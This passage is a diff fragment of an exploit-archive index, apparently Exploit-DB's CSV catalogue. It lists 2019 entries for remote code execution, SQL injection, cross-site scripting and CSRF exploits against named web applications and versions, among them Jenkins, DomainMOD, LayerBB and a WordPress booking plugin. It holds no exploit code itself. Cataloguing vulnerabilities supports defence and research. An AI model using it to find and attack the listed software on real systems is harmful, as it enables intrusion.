 46348,exploits/php/webapps/46348.py,"VA MAX 8.3.4 - Authenticated Remote Code Execution",2019-02-11,"Cody Sixteen",webapps,php,
@ -40830,6 +40833,12 @@ id,file,description,date,author,type,platform,port
 46352,exploits/linux/webapps/46352.rb,"Jenkins 2.150.2 -  Remote Command Execution (Metasploit)",2019-02-12,AkkuS,webapps,linux,
 46353,exploits/aspx/webapps/46353.cs,"BlogEngine.NET 3.3.6 - Directory Traversal / Remote Code Execution",2019-02-12,"Dustin Cobb",webapps,aspx,
 46354,exploits/php/webapps/46354.txt,"LayerBB 1.1.2 - Cross-Site Scripting",2019-02-12,0xB9,webapps,php,80
 46365,exploits/hardware/webapps/46365.txt,"Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Admin Token Disclosure)",2019-02-13,"Ronnie T Baby",webapps,hardware,80
 46366,exploits/php/webapps/46366.txt,"Rukovoditel Project Management CRM 2.4.1 - Cross-Site Scripting",2019-02-13,"Mehmet EMIROGLU",webapps,php,80
 46368,exploits/php/webapps/46368.txt,"PilusCart 1.4.1 - 'send' SQL Injection",2019-02-13,"Mehmet EMIROGLU",webapps,php,80
 46372,exploits/php/webapps/46372.txt,"DomainMOD 4.11.01 - 'ssl-provider-name' Cross-Site Scripting",2019-02-14,"Mohammed Abdul Raheem",webapps,php,
 46373,exploits/php/webapps/46373.txt,"DomainMOD 4.11.01 - 'ssl-accounts.php username' Cross-Site Scripting",2019-02-14,"Mohammed Abdul Raheem",webapps,php,80
 46374,exploits/php/webapps/46374.txt,"DomainMOD 4.11.01 - 'category.php CatagoryName_ StakeHolder' Cross-Site Scripting",2019-02-14,"Mohammed Abdul Raheem",webapps,php,80
 46375,exploits/php/webapps/46375.txt,"DomainMOD 4.11.01 - 'assets/add/dns.php' Cross-Site Scripting",2019-02-14,"Mohammed Abdul Kareem",webapps,php,80
 46376,exploits/php/webapps/46376.txt,"DomainMOD 4.11.01 - 'assets/edit/host.php?whid=5' Cross-Site Scripting",2019-02-14,"Mohammed Abdul Kareem",webapps,php,80
 46377,exploits/php/webapps/46377.txt,"WordPress Plugin Booking Calendar 8.4.3 - Authenticated SQL Injection",2019-02-14,B0UG,webapps,php,80
 46379,exploits/php/webapps/46379.txt,"LayerBB 1.1.2 - Cross-Site Request Forgery (Add Admin)",2019-02-14,0xB9,webapps,php,80